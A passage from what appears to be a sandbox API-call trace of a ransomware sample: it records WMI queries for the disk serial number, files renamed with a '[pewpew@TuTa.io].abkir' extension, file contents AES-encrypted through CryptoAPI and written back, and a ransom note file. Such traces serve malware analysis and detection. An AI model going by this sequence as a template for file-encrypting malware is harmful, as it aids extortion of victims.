[3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0202.139] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0202.139] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5b384) returned 0x0 [0202.139] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b384, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0202.139] WbemLocator:IUnknown:Release (This=0xb5b384) returned 0x3 [0202.139] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0202.139] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0202.139] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5b40c) returned 0x0 [0202.139] WbemLocator:IRpcOptions:Query (in: This=0xb5b40c, pPrx=0xb5b424, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0202.139] WbemLocator:IUnknown:Release (This=0xb5b40c) returned 0x3 [0202.139] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x2 [0202.139] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0202.139] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0202.140] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x6033584) returned 0x0 [0202.140] WbemLocator:IUnknown:AddRef (This=0x6033584) returned 0x4 [0202.140] WbemLocator:IUnknown:Release (This=0x6033584) returned 0x3 [0202.140] WbemLocator:IUnknown:Release (This=0x6033584) returned 0x2 [0202.140] SysStringLen (param_1=0x0) returned 0x0 [0202.140] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f10, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0202.140] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0202.140] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.140] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0202.140] WbemLocator:IUnknown:AddRef (This=0xb5b424) returned 0x3 [0202.140] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5b424) returned 0x0 [0202.140] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x3 [0202.140] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x2 [0202.140] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0202.140] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.140] IWbemServices:GetObject (in: This=0x6033584, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6027b20, ppCallResult=0x0) returned 0x0 [0202.408] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f80, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0202.408] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0202.408] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.408] IWbemClassObject:Get (in: This=0x6027b20, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3748c84*=0, plFlavor=0x3748c88*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3748c84*=8, plFlavor=0x3748c88*=0) returned 0x0 [0202.408] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.408] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.408] IWbemClassObject:Get (in: This=0x6027b20, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3748c84*=8, plFlavor=0x3748c88*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3748c84*=8, plFlavor=0x3748c88*=0) returned 0x0 [0202.408] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.408] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.409] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm", lpFilePart=0x0) returned 0x34 [0202.409] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x57 [0202.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0202.409] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmej.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x31ec86e0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0202.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0202.409] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmej.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeJ.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmej.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0202.410] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm", lpFilePart=0x0) returned 0x34 [0202.410] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0202.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0202.410] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0202.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0202.411] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm", lpFilePart=0x0) returned 0x34 [0202.411] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0202.411] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmek.htm"), fInfoLevelId=0x0, lpFileInformation=0x37491ac | out: lpFileInformation=0x37491ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4090)) returned 1 [0202.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0202.411] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm", lpFilePart=0x0) returned 0x34 [0202.411] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0202.411] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmek.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0202.411] GetFileType (hFile=0x32c) returned 0x1 [0202.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0202.412] GetFileType (hFile=0x32c) returned 0x1 [0202.412] GetFileSize (in: hFile=0x32c, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x4090 [0202.412] ReadFile (in: hFile=0x32c, lpBuffer=0x37aaaf8, nNumberOfBytesToRead=0x4090, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x37aaaf8*, lpNumberOfBytesRead=0x8f6eedc*=0x4090, lpOverlapped=0x0) returned 1 [0202.418] CloseHandle (hObject=0x32c) returned 1 [0202.419] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xbe00b8) returned 1 [0202.420] CryptGenRandom (in: hProv=0xbe00b8, dwLen=0x10, pbBuffer=0x37aeedc | out: pbBuffer=0x37aeedc) returned 1 [0202.845] CryptImportKey (in: hProv=0xbe00b8, pbData=0x36b7ec4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7fa10) returned 1 [0202.845] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0202.845] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0202.845] CryptDuplicateKey (in: hKey=0xb7fa10, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f510) returned 1 [0202.845] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0202.845] CryptSetKeyParam (hKey=0xb7f510, dwParam=0x4, pbData=0x36b7fa4*=0x1, dwFlags=0x0) returned 1 [0202.845] CryptSetKeyParam (hKey=0xb7f510, dwParam=0x1, pbData=0x36b7f70, dwFlags=0x0) returned 1 [0202.845] CryptEncrypt (in: hKey=0xb7f510, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36b7fb4*, pdwDataLen=0x8f6eea8*=0x40a0, dwBufLen=0x40a0 | out: pbData=0x36b7fb4*, pdwDataLen=0x8f6eea8*=0x40a0) returned 1 [0202.846] CryptEncrypt (in: hKey=0xb7f510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36bc078*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x36bc078*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0202.847] CryptDestroyKey (hKey=0xb7fa10) returned 1 [0202.847] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0202.847] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0202.847] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm", lpFilePart=0x0) returned 0x34 [0202.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0202.848] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmek.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0202.848] GetFileType (hFile=0x32c) returned 0x1 [0202.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0202.848] GetFileType (hFile=0x32c) returned 0x1 [0202.848] WriteFile (in: hFile=0x32c, lpBuffer=0x36bc678*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x36bc678*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0202.850] CloseHandle (hObject=0x32c) returned 1 [0202.850] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0202.850] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0202.850] CoTaskMemFree (pv=0xbed438) [0202.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0202.851] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0202.851] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0202.851] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0202.851] IUnknown:Release (This=0xb51e34) returned 0x1 [0202.852] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x60276e0) returned 0x0 [0202.852] WbemDefPath:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0202.852] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60276e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x60314a0) returned 0x0 [0202.853] WbemDefPath:IUnknown:Release (This=0x60276e0) returned 0x0 [0202.853] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x60314a0) returned 0x0 [0202.853] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0202.853] WbemDefPath:IUnknown:AddRef (This=0x60314a0) returned 0x3 [0202.853] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0202.853] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0202.853] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0x66ce2a8) returned 0x0 [0202.853] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce2a8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0202.853] WbemDefPath:IUnknown:Release (This=0x66ce2a8) returned 0x3 [0202.853] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0202.853] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0202.853] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0202.853] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x2 [0202.853] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x1 [0202.853] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0202.853] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0202.854] WbemDefPath:IUnknown:QueryInterface (in: This=0x60314a0, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x60314a0) returned 0x0 [0202.854] WbemDefPath:IUnknown:AddRef (This=0x60314a0) returned 0x3 [0202.854] WbemDefPath:IUnknown:Release (This=0x60314a0) returned 0x2 [0202.854] WbemDefPath:IWbemPath:SetText (This=0x60314a0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.854] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60314a0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0202.854] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0202.854] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.854] WbemDefPath:IWbemPath:GetInfo (in: This=0x60314a0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0202.854] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60314a0, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0202.854] WbemDefPath:IWbemPath:GetInfo (in: This=0x60314a0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0202.854] WbemDefPath:IWbemPath:GetInfo (in: This=0x60314a0, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0202.854] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60314a0, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0202.854] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0202.854] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0202.854] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.854] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0202.854] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0202.854] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0202.854] IUnknown:Release (This=0xb51e34) returned 0x1 [0202.855] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6027260) returned 0x0 [0202.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027260, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0202.856] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027260, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6031510) returned 0x0 [0202.856] WbemDefPath:IUnknown:Release (This=0x6027260) returned 0x0 [0202.856] WbemDefPath:IUnknown:QueryInterface 